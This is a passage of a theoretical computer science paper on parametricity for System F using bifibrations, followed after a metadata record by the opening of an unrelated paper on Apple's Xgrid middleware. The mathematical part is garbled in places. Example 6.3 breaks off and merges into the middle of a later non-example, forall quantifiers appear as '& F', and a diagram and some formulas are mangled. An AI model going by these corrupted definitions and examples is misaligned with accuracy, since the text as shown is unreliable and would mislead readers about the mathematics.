a bifibration with fibred terminal objects and \( \mathcal{B} \) be a CCC. (i) If \( \text{Eq} : \mathcal{B} \to \text{Rel}(\mathcal{E}) \) has a left adjoint \( Q \), then \( \text{Eq} \) preserves exponentials iff \( Q \) satisfies the Frobenius property. Such a \( Q \) exists if \( U : \mathcal{E} \to \mathcal{B} \) has full comprehension, \( \text{Eq} : \mathcal{B} \to \text{Rel}(\mathcal{E}) \) is full and \( \mathcal{B} \) has pushouts. (ii) If \( U : \mathcal{E} \to \mathcal{B} \) is a fibred CCC and has simple products (i.e., if, for every projection \( \pi_B : A \times B \to A \) in \( \mathcal{B} \), the reindexing functor \( \pi_B^* \) has a right adjoint and the Beck-Chevalley condition holds), then \( \mathcal{E} \) is a CCC and \( U \) preserves the cartesian closed structure. Change of base preserves simple products and fibred structure, so \( \text{Rel}(U) \) is a fibred CCC with simple products if \( U \) is. Moreover, \( \mathcal{B} \times \mathcal{B} \) is a CCC if \( \mathcal{B} \) is. Lemma 4.4 thus derives structure in \( \text{Rel}(U) \) from structure in \( U \). ### 4.2 Interpreting Forall Types We must generalise Reynolds’ definitions of \([-]\) and \([\_]_r\) for forall types to relations fibrations in such a way that the Abstraction Theorem and IEL hold. The rules for type abstraction and type application suggest that we should interpret \( \forall \) as right adjoint to weakening by a type variable. We may first try to look for such an adjoint on the base category, then another on the total category, and then try to link these adjoints. But this is the wrong idea; for the relations fibration of Example 2.5, this gives all polymorphic functions, not just the parametrically polymorphic ones. Instead, we require an adjoint for the combined fibred semantics. Let \( |\text{Rel}(U)|^n \to^{\text{Eq}} \text{Rel}(U) \) be the category whose objects are equality preserving fibred functors from \( |\text{Rel}(U)|^n \) to \( \text{Rel}(U) \) and whose morphisms are fibred natural transformations between them. Then: **Definition 4.5** \( \text{Rel}(U) \) is a \( \forall \)-fibration if, for every projection \( \pi_n : |\text{Rel}(U)|^{n+1} \to |\text{Rel}(U)|^n \), the functor \( \circ \pi_n : (|\text{Rel}(U)|^n \to^{\text{Eq}} \text{Rel}(U)) \to (|\text{Rel}(U)|^{n+1} \to^{\text{Eq}} \text{Rel}(U)) \) has a right adjoint \( \forall_n \) and this family of adjunctions is natural in \( n \). We write \( \forall \) for \( \forall_n \) when \( n \) can be inferred. This definition follows, e.g., Dunphy and Reddy [7] by “baking the Identity Extension Lemma into” the definition of forall types — in the sense that the very existence of \( \forall \) requires that if \( F \) is equality preserving then so is \( \forall F \) — rather than relegating it to a result to be proved post facto. If \( U \) is faithful, then Definition 4.5 can be reformulated in terms of more basic concepts using its opfibrational structure. The IEL then becomes a consequence of the definition, rather than an intrinsic part of it [9]. For the purposes of this paper, this abstract specification is enough. 4.3 Fibred functors with discrete domains form a parametric model A λ2-fibration, i.e., a fibration $p : G \to S$ with fibred finite products, finite products in $S$, fibred exponents, a generic object $\Omega$, and simple $\Omega$-products, is a categorical model of System F. Seely [29] gives a sound interpretation of the calculus in such fibrations. We conclude this section with the following theorem: **Theorem 4.6** If $\text{Rel}(U)$ is an equality preserving arrow fibration and a $\forall$-fibration, then there is a $\lambda 2$-fibration in which types $\Gamma \vdash T$ are interpreted as equality preserving fibred functors $[T] : [\text{Rel}(U)][\Gamma] \to_{\text{Eq}} \text{Rel}(U)$ and terms $\Gamma; \Delta \vdash t : T$ are interpreted as fibred natural transformations $[[t]] : [[\Delta]] \to [T]$. \hfill $\Box$ Note that Lemma 4.4 gives conditions for $\text{Rel}(U)$ to be an arrow fibration, and our other paper [9] similarly gives conditions for $\text{Rel}(U)$ to be a $\forall$-fibration. Unwinding the interpretation of System F in $\lambda 2$-fibrations [29], we see that we get the following for every fibration $U : E \to B$ satisfying the hypotheses of the theorem: for every System F type $\Gamma \vdash T$ and term $\Gamma; \Delta \vdash t : T$, we get (i) a standard interpretation of $\Gamma \vdash T$ as a functor $[T]_o : |B|^{[\Gamma]} \to B$; (ii) a relational interpretation of $\Gamma \vdash T$ as a functor $[T]_r : |\text{Rel}(E)|^{[\Gamma]} \to \text{Rel}(E)$; (iii) a proof of the Identity Extension Lemma in the form of Lemma 3.2, i.e., a proof that $[T]$ is equality preserving; (iv) a standard interpretation of $\Gamma; \Delta \vdash t : T$ as a natural transformation $[[t]]_o : [[\Delta]]_o \to [T]_o$; and (v) a proof of the Abstraction Theorem in the form of Theorem 3.3, i.e., a proof that $\Gamma; \Delta \vdash t : T$ has a relational interpretation as a natural transformation $[[t]]_r : [[\Delta]]_r \to [T]_r$ over $[[t]]_o \times [[t]]_o$. Theorem 4.6 also gives a powerful internal language [16], where base types in type context $\Gamma$ are given by fibred functors $|\text{Rel}(U)|^{[\Gamma]} \to_{\text{Eq}} \text{Rel}(U)$, and base term constants in term context $\Delta$ are given by fibred natural transformations $[[\Delta]] \to [T]$. Thus, we can use this language to reason about our models using System F. This will be used in the proofs of Theorems 5.7 and 5.11 below. 5 Consequences of parametricity We use our new framework to derive expected consequences of parametricity. This serves as a “sanity check” for our new bifibrational conceptualisation, and shows that our framework is powerful enough to derive the same results as, e.g., Birkedal and Møgelberg [4]. At a high-level, our proof strategies are often similar to the ones found in the literature, while the proofs of individual facts are necessarily specific to our setting, and often fibrational in nature. 5.1 Graph Relations In the fibration $U : \text{Rel} \to \text{Set} \times \text{Set}$ every function $f : X \to Y$ defines a graph relation $\langle f \rangle = \{(x,y) \mid fx = y\} \subseteq X \times Y$. This generalises to the fibrational setting, where the graph of $f : A \to B$ is obtained by reindexing the equality relation on $B$. Definition 5.1 Let $U : \mathcal{E} \to \mathcal{B}$ be a fibration with fibred terminal objects and products in $\mathcal{B}$. The graph of $h : X \to Y$ in $\mathcal{B}$ is $(h) = (h, \text{id}_Y) \ast (\text{Eq} Y)$ in $\text{Rel}(\mathcal{E})$. The definition of $(h)$ agrees with the set-theoretic one for the set-relations fibration on $\text{Set}$. Since reindexing preserves identities, $(\text{id}_A) = (\text{id}_A, \text{id}_A) \ast (\text{Eq} A) = \text{Eq} A$ for any object $A$ of $\mathcal{B}$. In a bifibration, we can also define the graph of $f : A \to B$ in another, isomorphic way by using opfibrational structure to opreindex equality on $A$. Lemma 5.2 (Lawvere [17]) If $U : \mathcal{E} \to \mathcal{B}$ is a bifibration with fibred terminal objects that satisfies the Beck-Chevalley condition [16, Section 1.8.11], and if $\mathcal{B}$ has products, then the graph of $h : X \to Y$ can also be described by $(h) = \Sigma_{(h, \text{id}_Y)} (\text{Eq} X)$. □ Being able to describe graph relations in terms of either reindexing or opreindexing in any bifibration lets us use the universal properties of both when proving theorems about them. Graph relations are the key structures that turn morphisms in $\mathcal{B}$ into objects in $\text{Rel}(\mathcal{E})$ and, more generally, mediate the standard and relational semantics. The graph functor for $\text{Rel}(U) : \text{Rel}(\mathcal{E}) \to \mathcal{B} \times \mathcal{B}$ is the functor $(\_ : \mathcal{B} \to \text{Rel}(\mathcal{E})$ mapping $f : X \to Y$ in $\mathcal{B}$ to $(f)$ in $\text{Rel}(\mathcal{E})$. To see how $(\_)$ acts on morphisms, recall that if $f : X \to Y$ and $f' : X' \to Y'$ are objects of $\mathcal{B} \to \mathcal{E}$, then a morphism from $f$ to $f'$ is a pair of morphisms $g : X \to X'$ and $h : Y \to Y'$ such that $f' \circ g = h \circ f$. The universal property of reindexing in $\text{Rel}(U)$ guarantees the existence of a unique morphism $(g, h) : (f) \to (f')$ over $(g, h)$ such that the following diagram commutes: \[ \begin{array}{c} \exists ! (g, h) \downarrow \vdash (f, \text{id}) \downarrow \\ \downarrow \quad \quad \quad \downarrow \\ (f', \text{id}) \downarrow \end{array} \] Lemma 5.3 If the underlying bifibration satisfies the Beck-Chevalley condition, then $(\_ : \mathcal{B} \to \text{Rel}(\mathcal{E})$ is full and faithful if $\text{Eq} : \mathcal{B} \to \text{Rel}(\mathcal{E})$ is. □ The proof uses the opfibrational characterisation of the graph functor from Lemma 5.2. The main tool for deriving consequences of parametricity is the Graph Lemma, which relates the graph of the action of a functor on a morphism with its relational action on the graph of the morphism. Interestingly, although our setting is possibly proof-relevant (i.e., there can be multiple proofs that two elements are related), the following “logical equivalence” version of the Graph Lemma is strong enough for our applications. If $U : \mathcal{E} \to \mathcal{B}$ and $U' : \mathcal{E}' \to \mathcal{B}'$ are fibrations, we write $(F_o, F_r) : \text{Rel}(U) \to \text{Eq} \text{Rel}(U')$ to indicate that functors (not necessarily fibred) $F_o : \mathcal{B} \to \mathcal{B}'$ and $F_r : \text{Rel}(\mathcal{E}) \to \text{Rel}(\mathcal{E}')$ are such that $\text{Rel}(U') \circ F_r = (F_o \times F_o) \circ \text{Rel}(U)$, and $(F_o, F_r)$ is equality preserving, i.e., $F_r \circ \text{Eq} = \text{Eq} \circ F_o$. Theorem 5.4 (Graph Lemma) Assume the underlying bifibration satisfies the Beck-Chevalley condition, and let $(F_o, F_r) : \text{Rel}(U) \to \text{Eq} \text{Rel}(U)$. For any $h : X \to Y$ in $\mathcal{B}$, there are vertical morphisms $\phi_h : (F_o h) \to F_r (h)$ and $\psi_h : F_r (h) \to (F_o h)$ in $\text{Rel}(\mathcal{E})$. Our proof of the Graph Lemma is completely independent of the specific functor $(F_o, F_r)$, and so in particular does not proceed by induction on the structure of types. This is a key reason why we can go beyond Dunphy and Reddy [7] and prove the existence of initial algebras of positive, rather than just strictly positive, type expressions. 5.2 Existence of Initial Algebras Let $F : C \to C$ be an endofunctor. An $F$-algebra is a pair $(A, k_A)$ with $A$ an object of $C$ and $k_A : FA \to A$ a morphism. We call $A$ the carrier of the $F$-algebra and $k_A$ its structure map. A morphism $h : A \to B$ in $C$ is an $F$-algebra homomorphism $h : (A, k_A) \to (B, k_B)$ if $k_B \circ (F h) = h \circ k_A$. An $F$-algebra $(Z, in)$ is weakly initial if, for any $F$-algebra $(A, k_A)$, there exists a mediating $F$-algebra homomorphism $\text{fold}[A, k_A] : (Z, in) \to (A, k_A)$. It is an initial $F$-algebra if $\text{fold}[A, k_A]$ is unique. The literature contains other proofs that initial algebras exist in parametric models (e.g., [4,24]). Closest to our setting is Dunphy and Reddy [7], who show that strictly positive types have initial algebras. Under assumptions no stronger than theirs, we sharpen this result to all positive types, or, more generally, all functors on our parametric models that are strong (see below) and equality preserving. Let $F = (F_o, F_r) : \text{Rel}(U) \to \text{Eq} \text{Rel}(U)$ be a functor (note that the domain of $F$ is not discrete and that $F$ need not preserve cartesian morphisms) with a strength $t = (t_o, t_r)$, i.e., a family of morphisms $(t_o)_{A,B} : A \Rightarrow B \Rightarrow F_oA \Rightarrow F_oB$ and $(t_r)_{R,S} : R \Rightarrow S \Rightarrow F_rR \Rightarrow F_rS$ with $(t_r)_{R,S}$ over $((t_o)_{A,B}, (t_o)_{C,D})$ if $R$ is over $(A, B)$ and $S$ is over $(C, D)$, such that $t$ preserves identity and composition. A functor with a strength is said to be strong. Because of the discrete domains, $t$ is a natural transformation from $\Rightarrow \Rightarrow$ to $F_\Rightarrow \Rightarrow$ in $|\text{Rel}(U)|^2 \to \text{Eq} \text{Rel}(U)$, and thus $\alpha, \beta : (\alpha \Rightarrow \beta) \to (\text{E}[\alpha] \Rightarrow \text{E}[\beta])$ represents the action of $F$ on morphisms in the internal language. All type expressions with one free type variable occurring only positively give rise to strong functors, but there are further examples of such functors, for instance if the model contains non-System F type constructions with natural functorial (and relational) interpretations — for example, those of dependent types in $\text{Set}$. We will show that an initial $F_o$-algebra exists. For this, we first construct a weak initial $F_o$-algebra, which can be done in any $\lambda 2$-fibration. Using the internal language, we define $Z$ by $(Z_o, Z_r) = [\forall X. (F X \to X) \to X]$. Lemma 5.5 $Z_o$ is the carrier of a weak initial $F_o$-algebra $(Z_o, in_o)$ with mediating morphism $\text{fold}_o[A, k]$ and $Z_r$ is the carrier of a weak initial $F_r$-algebra $(Z_r, in_r)$ with mediating morphism $\text{fold}_r[A, k]$. \hfill \Box To show that $\text{fold}_o$ is unique, we use the graph relations from Section 5.1. Recall that a category with a terminal object $1$ is well-pointed if, for any $f, g : A \to B$, we have $f = g$ iff $f \circ e = g \circ e$ for all $e : 1 \to A$. Like Dunphy and Reddy [7], we only consider well-pointed base categories; well-pointedness is used to convert internal language reasoning in non-empty contexts to closed contexts, so that we can apply semantic techniques such as Theorem 5.4. Lemma 5.6 Assume that the underlying bifibration satisfies the Beck-Chevalley condition, and that $\text{Eq}$ is full. (i) If $B$ is well-pointed, then $\text{fold}_o[Z_o, in_o] = \text{id}_Z$. 11 (ii) For every $F_o$-algebra homomorphism $h : (Z_o, in_o) \to (A, k_A)$, we have that $h \circ \text{fold}_o[Z_o, in_o] = \text{fold}_o[A, k_A]$. The proofs of the two parts of Lemma 5.6 are similar: both use the graph functor to map commuting diagrams in $B$ to morphisms in $\text{Rel}(E)$, and then use the Graph Lemma to see that these morphisms are $F_i$-algebras. Lemma 5.5 and Lemma 5.6 together now immediately imply the main result. **Theorem 5.7** If the underlying bifibration satisfies the Beck-Chevalley condition, $\text{Eq}$ is full, and $B$ is well-pointed, then $(Z_o, in_o)$ is an initial $F_o$-algebra. We show in Section 6 that these hypothesis cannot be weakened. One may wonder if the above result can be strengthened to get not only an initial $F_o$-algebra, but also an initial $F_i$-algebra. Certainly this is possible for the relations fibration $\text{Rel} \to \text{Set} \times \text{Set}$, since relations in $\text{Rel}$ are proof irrelevant: maps either preserve relatedness or not. This translates in the axiomatic bifibrational setting to requiring the fibration $\text{Rel}(E) \to B \times B$ to be faithful. When it is, the weak initial $F_i$-algebra is, in fact, initial: faithfulness implies the required uniqueness. ### 5.3 Existence of final coalgebras We can also dualise the proof from the previous section to show the existence of final coalgebras in the usual manner [11]. As usual, this requires us to first encode products and existential types in System F. We encode products as $A \times B = \forall Y.(A \to B \to Y) \to Y$. This supports the usual pairing and projection operations, as well as surjective pairing using parametricity. We encode existential types by $\exists X.T = \forall Y.(\forall X.(T \to Y)) \to Y$. We can support introduction and elimination rules $$ \frac{\Gamma \vdash A \text{ type } \Gamma; \Delta \vdash u : T[A/X]}{\Gamma; \Delta \vdash (A, u) : \exists X.T(X)} $$ with the conversion $\text{open}(A,t) as \langle Z,y \rangle in s = s[Z/X,A,y/t]$ by defining $\langle A,t \rangle = \Delta Y.\lambda f.f \circ A t$ and $\text{open} t as \langle Z,y \rangle in s = t V (\Delta Z.\lambda y.s)$. Using parametricity we can prove the following commutation property and $\eta$-rule for existential types: **Lemma 5.8** Assume the underlying bifibration satisfies the Beck-Chevalley condition, and that $\text{Eq}$ is full. (i) Let $\Gamma; \Delta \vdash t : \exists X.T$, let $\Gamma, Z; \Delta, u : T[Z/X] \vdash s : S$ and let $\Gamma; \Delta \vdash f : S \to S'$ for a closed type $S'$. Then $[[f(\text{open} t as \langle Z,u \rangle in s)]]_o = [[\text{open} t as \langle Z,u \rangle in f(s)]]_o$. (ii) If $\Gamma; \Delta \vdash t : \exists X.T$, then $[[\text{open} t as \langle Z,u \rangle in \langle Z,u \rangle]]_o = [[t]]_o$. If $F : C \to C$ is an endofunctor, an $F$-coalgebra is a pair $(A, k_A)$ with $A$ an object of $C$ and $k_A : A \to FA$ a morphism. We call $A$ the carrier of the $F$-coalgebra and $k_A$ its structure map. A morphism $h : A \to B$ in $C$ is an $F$-coalgebra homomorphism $h : (A, k_A) \to (B, k_B)$ if $k_B \circ h = Fh \circ k_A$. An $F$-coalgebra $(W, out)$ is weakly final if, for any $F$-coalgebra $(A, k_A)$, there exists a mediator $F$-coalgebra homomorphism $\text{unfold}[A, k_A] : (A, k_A) \to (W, out)$. It is a final $F$-coalgebra if $\text{unfold}[A, k_A]$ is unique. Let $F = (F_o, F_r) : \text{Rel}(U) \to \text{Eq} \text{Rel}(U)$ be a functor with a strength $t$. We show that the final $F_o$-coalgebra exists. Again, we first construct a weakly final coalgebra by defining $W = (W_o, W_r) = [\exists X. (X \to F(X)) \times X]$. **Lemma 5.9** $W_o$ is the carrier of a weakly final $F_o$-coalgebra $(W_o, out_o)$ with mediating morphism $\text{unfold}_o[A,k]$ and $W_r$ is the carrier of a weakly final $F_r$-coalgebra $(W_r, out_r)$ with mediating morphism $\text{unfold}_r[A,k]$. We proceed similarly to Lemma 5.6. This time, we use the opfibrational part of the Graph Lemma to construct $F_r$-coalgebras. **Lemma 5.10** Assume the underlying bifibration satisfies the Beck-Chevalley condition, and that $\text{Eq}$ is full. (i) For every $F_o$-coalgebra morphism $h : (A, k_A) \to (B, k_B)$ we have $\text{unfold}_o[B, k_B] \circ h = \text{unfold}_o[A, k_A]$. (ii) $\text{unfold}_o[W_o, out_o] = \text{id}_{W_o}$. Putting things together, we have constructed a final coalgebra. **Theorem 5.11** If the underlying bifibration satisfies the Beck-Chevalley condition, and if $\text{Eq}$ is full, then $(W_o, out_o)$ is a final $F_o$-coalgebra. **5.4 Parametricity Implies Dinaturality** We show that our axiomatic foundations can be used to prove that dinaturality can be deduced from parametricity. This is well-known in other settings (see, e.g., [4, Section 5.1]), but we do it because i) it shows our foundation passes this test; and ii) it highlights again the use of bifibrations to give two definitions of the graph of a function both of which are used in the proof. First, the definition of dinaturality: **Definition 5.12** If $F, G : \mathcal{B}^{op} \times \mathcal{B} \to \mathcal{B}$ are mixed variant functors, then a dinatural transformation $t : F \to G$ is a collection of morphisms $t_X : FXX \to GXX$ indexed by objects $X$ of $\mathcal{B}$ such that, for every $g : X \to Y$ of $\mathcal{B}$, the following commutes: We note that our proof applies to all mixed variant functors with equality preserving liftings, not just strong such functors. **Theorem 5.13** Let $(F_o, F_r), (G_o, G_r) : \text{Rel}(U)^{op} \times \text{Rel}(U) \to \text{Eq} \text{Rel}(U)$. Further, let $t^0_A : F_o AA \to G_o AA$ be a family indexed by objects $A$ of $\mathcal{B}$, and $t^1_R : FrRR \to GrRR$ be a family indexed by objects $R$ of $\text{Rel}(E)$ such that if $R$ is over $(A, B)$, then $t^1_R$ is over $(t^0_A, t^0_B)$. Then $t^0$ is a dinatural transformation from $F_o$ to $G_o$. Theorem 5.13 applies in particular to the interpretation of terms $t : \forall X.FXX \to GXX$ where $F$ and $G$ are given by type expressions with two free type variables, one occurring positively and one negatively. As is well known, dinaturality reduces to naturality when $F$ and $G$ are covariant. 6 Examples The construction of examples remains delicate — for instance, there are no set-theoretic models with a classical meta-theory. We give five models: Examples 6.1, 6.3, 6.4 and 6.5 are to be regarded as being internal to the Calculus of Constructions with impredicative Set (with ¬¬-stable equality for Example 6.3), while Example 6.2 is internal to the category of ω-sets. Before doing so, we take a moment to emphasise the generality of our framework. Considering different fibrations, we can derive parametric models with very different flavours. For example, changing the base category of the fibration corresponds to changing the ‘standard’ model in which we interpret types and terms. Changing the total category and the fibration (i.e., the functor itself) corresponds to changing the relevant notion of relational logic. We take advantage of the possibility of non-standard relations in Examples 6.2, 6.3 and Non-example 6.5. Example 6.1 Reynolds’ set-theoretic model is an instance of our framework via the relations fibration on Set. The equality functor is full and faithful in this bifibration, and Set is well-pointed. Hence Theorems 5.7 and 5.13 ensure that initial algebras exist, and that all terms are interpreted as dinatural transformations. Example 6.2 The PER model of Bainbridge et al. [2] is an instance of our framework, if bifibrations are understood as internal to the category of ω-sets, so that natural transformations are uniformly realised. For a detailed construction of a model using a category of PERs internal to ω-sets). An object of the category $\text{PER}_N$ is a symmetric, transitive relation $R \subseteq N \times N$. A morphism from $R$ to $S$ is a function $f : \mathbb{N}/R \to \mathbb{N}/S$ that is tracked by some partial recursive function $\phi_k : \mathbb{N} \to \mathbb{N}$, i.e., such that $f([n]_R) = [\phi_k(n)]_S$ for all $[n]_R \in \mathbb{N}/R$. The appropriate notion of predicate with respect to a PER $R$ is that of a saturated subset, i.e., a subset $P \subseteq \mathbb{N}$ such that $P(x)$ and $R(x,x')$ implies $P(x')$. Saturated subsets form a bifibration over PERs with a full and faithful equality functor $\text{Eq}A = A$. The CCC structure of $\text{PER}_N$ and $\text{SatRel}$ is standard; a bijective pairing function $\langle , \rangle : \mathbb{N} \times \mathbb{N} \to \mathbb{N}$ gives the product and recursion theory (the s-m-n Theorem) gives the exponential. The interesting case is that of forall types, which are interpreted as (cut-down, to ensure equality preservingness) intersections of PERs: $[\forall x.F]_o R = \{(n,k) \in \bigcap_{i_0 : \text{PER}_N} [F]_{i_0}(R,R') \mid \forall Q : \text{SatRel}(S,T),(n,n), (k,k) \in [F]_r(\text{Eq}(R),Q)) \text{ and } [\forall x.F]_r P = \bigcap_{Q : \text{SatRel}(R,S)} [F]_r(P,Q)$. Since $\text{PER}_N$ is also well-pointed, Theorems 5.7 and 5.13 again apply. Example 6.3 The previous models are well-known, but our framework also suggests new ones. A relation $R \subseteq X \times Y$ can be understood classically as a function from $X \times Y$ to $\text{Bool}$. (Constructively, this only covers decidable relations.) Here, $\text{Bool}$ can be replaced with any constructively completely distributive [8] non-trivial lattice $\mathcal{V}$ of “truth values”, leading to “multi-valued parametricity”. For instance, the collection $\mathcal{D}(L)$ of all down-closed subsets of a complete lattice $L$ is constructively completely distributive, and classically, we recover $\text{Bool}$ as $\mathcal{D}(1)$. The category $\text{Fam}(\mathcal{V})$ has objects $(A,p)$, where $A$ is a set and $p : A \to \mathcal{V}$ is thought of as a $\mathcal{V}$-valued predicate. The families fibration $\pi : \text{Fam}(\mathcal{V}) \to \text{Set}$ is a bifibration with $\Sigma_f(Q)(y) = \sup_{x=y} Q(x)$, fibred terminal objects $(X, \lambda \perp, \top)$, where $\top$ is the greatest element of \( \mathcal{V} \), and comprehension given by \( \{ (A, p) \} = p^{-1}(\top) \). Since \( \mathcal{V} \) is complete, it is a Heyting algebra, so that \( \pi : \text{Fam}(\mathcal{V}) \to \text{Set} \) is a fibred CCC. Also, \( \pi \) has simple products given by \( \Pi_{\pi}(A \times B, p)(a) = \inf_{x \in B} p(a, b) \). By Lemma 4.4, \( \text{Rel}(\pi) \) is thus an equality preserving arrow fibration. Finally, the interpretation of forall types is given by \( \& \mathcal{F} \) of \( \forall X. X \to X \) is not the singleton \( G \)-set 1 as expected, but instead contains all the elements of the group \( G \). We conjecture that this non-example also extends to a constructive treatment of the category of nominal sets [23]. Non-example 6.5 The identity fibration \( \text{Id} : \text{Set} \to \text{Set} \) models ad hoc polymorphism: it is a \( \forall \)- and arrow-fibration, but the equality functor \( \text{Eq} X = X \times X \) is not full. This explains why Theorem 5.13 fails: \( \& \mathcal{F} X \) includes ad hoc polymorphic functions, so that e.g. \( \& \mathcal{F} X. X \to X \) contains non-natural transformations such as \( \eta \), where \( \eta_{\text{Bool}}(x) = \neg x \) and \( \eta_X(x) = x \) for \( X \neq \text{Bool} \). 7 Conclusions and future work Our interpretation of types and terms as fibred functors and fibred natural transformations shows that parametricity entails replacing the usual categorical semantics involving categories, functors, and transformations with one based on fibrations, fibred functors, and fibred transformations. The results in Section 5 show that our new approach based on bifibrations hits the sweet spot of a light structure that still suffices to prove key results. Work is ongoing in using the bifibrational framework to develop new notions such as proof-relevant parametricity, and higher order parametricity with interesting links to cubical sets that also appear in the semantics of Homotopy Type Theory [3]. Acknowledgement We thank the reviewers of this and previous versions of the paper for their comments and suggestions. We especially thank Uday Reddy for extremely valuable advice and encouragement. Research supported by EPSRC grants EP/K023837/1 (NG, FNF), EP/M016951/1 (NG), NSF award 1420175 (PJ), and SICSA (FO). References
{"Source-Url": "http://www.cs.appstate.edu/~johannp/mfps15.pdf", "len_cl100k_base": 15738, "olmocr-version": "0.1.51", "pdf-total-pages": 17, "total-fallback-pages": 0, "total-input-tokens": 74767, "total-output-tokens": 18463, "length": "2e13", "weborganizer": {"__label__adult": 0.0006570816040039062, "__label__art_design": 0.0007929801940917969, "__label__crime_law": 0.0005936622619628906, "__label__education_jobs": 0.001964569091796875, "__label__entertainment": 0.0002186298370361328, "__label__fashion_beauty": 0.0003509521484375, "__label__finance_business": 0.0007038116455078125, "__label__food_dining": 0.0010385513305664062, "__label__games": 0.0013990402221679688, "__label__hardware": 0.00127410888671875, "__label__health": 0.00208282470703125, "__label__history": 0.0008487701416015625, "__label__home_hobbies": 0.0002722740173339844, "__label__industrial": 0.0012836456298828125, "__label__literature": 0.002239227294921875, "__label__politics": 0.000759124755859375, "__label__religion": 0.0013360977172851562, "__label__science_tech": 0.40380859375, "__label__social_life": 0.00024127960205078125, "__label__software": 0.006221771240234375, "__label__software_dev": 0.5693359375, "__label__sports_fitness": 0.0004355907440185547, "__label__transportation": 0.0017557144165039062, "__label__travel": 0.0003342628479003906}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 56155, 0.02591]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 56155, 0.39147]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 56155, 0.78215]], "google_gemma-3-12b-it_contains_pii": [[0, 2412, false], [2412, 6292, null], [6292, 10381, null], [10381, 14338, null], [14338, 17227, null], [17227, 21101, null], [21101, 24960, null], [24960, 28823, null], [28823, 32119, null], [32119, 36046, null], [36046, 39705, null], [39705, 43305, null], [43305, 45951, null], [45951, 49867, null], [49867, 52186, null], [52186, 55705, null], [55705, 56155, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2412, true], [2412, 6292, null], [6292, 10381, null], [10381, 14338, null], [14338, 17227, null], [17227, 21101, null], [21101, 24960, null], [24960, 28823, null], [28823, 32119, null], [32119, 36046, null], [36046, 39705, null], [39705, 43305, null], [43305, 45951, null], [45951, 49867, null], [49867, 52186, null], [52186, 55705, null], [55705, 56155, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 56155, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 56155, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 56155, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 56155, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 56155, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 56155, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 56155, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 56155, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 56155, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 56155, null]], "pdf_page_numbers": [[0, 2412, 1], [2412, 6292, 2], [6292, 10381, 3], [10381, 14338, 4], [14338, 17227, 5], [17227, 21101, 6], [21101, 24960, 7], [24960, 28823, 8], [28823, 32119, 9], [32119, 36046, 10], [36046, 39705, 11], [39705, 43305, 12], [43305, 45951, 13], [45951, 49867, 14], [49867, 52186, 15], [52186, 55705, 16], [55705, 56155, 17]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 56155, 0.0]]}
olmocr_science_pdfs
2024-12-03
2024-12-03
297524450f4554231fb8523dc905cb130e46babc
Building Computational Grids with Apple’s Xgrid Middleware Baden Hughes Department of Computer Science and Software Engineering The University of Melbourne, Parkville VIC 3010, Australia Email: badenh@csse.unimelb.edu.au Abstract Apple’s release of the Xgrid framework for distributed computing introduces a new technology solution for loosely coupled distributed computation. In this paper systematically describe, compare and evaluate the Apple native Xgrid solution and a range of third party components which can be substituted for the native versions. This description and evaluation is grounded in practical experience of deploying a small scale, internationally distributed, heterogenous computational infrastructure based on the Xgrid framework. Keywords: Xgrid, Apple, computational grid, middleware 1 Introduction The release in 2005 of Apple’s Xgrid framework for grid introduces a new technology solution for loosely coupled, distributed computation. Xgrid has been widely promoted as an extremely usable solution for less technical user communities and challenges the systems management paradigm incumbent in many computational grid solutions currently deployed. As such, the uptake of grid computing by ad hoc groups of researchers with non-dedicated infrastructure using the Xgrid framework has been significant, in numerical terms and in terms of the visibility of the solution. A particular point to note is that the simple Xgrid framework has the potential to fundamentally change the delineation between grid users and grid maintainers, and as such to promote new types of research enabled by a self-sustaining model for managing computational grid infrastructure. For researchers in the grid computing space and for systems managers of production grid facilities, Xgrid has often been viewed as a toy solution. This paper seeks to counter this perception in two ways: first by describing the Xgrid architecture and its components in detail, and secondly by adopting an analysis model more prevalent in the grid computing domain. A notable point here is that this paper does not simply cover the Apple distributed native Xgrid components but also considers a range of third party components which can be used to extend the Xgrid framework in directions more amenable to the types of production environments currently occupied by solutions such as the widely used Globus toolkit. The structure of this paper is as follows. First we consider the overall positioning of the Apple Xgrid solution, and its high level systems architecture. Next we review in depth the Xgrid architecture and components officially distributed by Apple in Xgrid 1.0. Following this we will review a range of interoperable third party components that can be used to complement or replace the proprietary Apple components under certain circumstances. We report experience in using a heterogenous Xgrid to perform some experiments in natural language processing; and report on a range of other production uses of Xgrid based on published papers and user group surveys. Finally we conduct an evaluation of the overall strengths and weaknesses of the Xgrid solution and consider the niche(s) into which Xgrid based solutions may effectively be deployed and offer some concluding thoughts. It is worth stating upfront that this paper specifically does not seek to either conduct empirical performance comparisons between Xgrid and alternative grid computing solutions nor to report the results of a specific scientific experiment which is enabled by Xgrid-based infrastructure. Rather the purpose of this paper is to describe, and where relevant compare and evaluate the overall Xgrid architecture and its components from a functional perspective. 2 A Brief History of Xgrid Xgrid was first introduced by Apple in January 2004 as a Technology Preview (TP1). Xgrid TP1 was considered as a proof of concept, and was not designed for production applications owing to reliability, security and scalability issues. Rather it was designed to draw feedback from early adopters as to the viability of an Apple grid computing product. Xgrid Technology preview (TP2) was released in November 2004, retaining most of the functionality of TP1, but with some of the underlying CLI and data format changes. This was a very widely adopted release, Xgrid based computational environments were deployed for production use, and third party components began to emerge. Xgrid 1.0 was released with Mac OS X 10.4 ‘Tiger’ in April 2005. 1.0 introduced a significant number of changes. Perhaps controversially, Xgrid 1.0 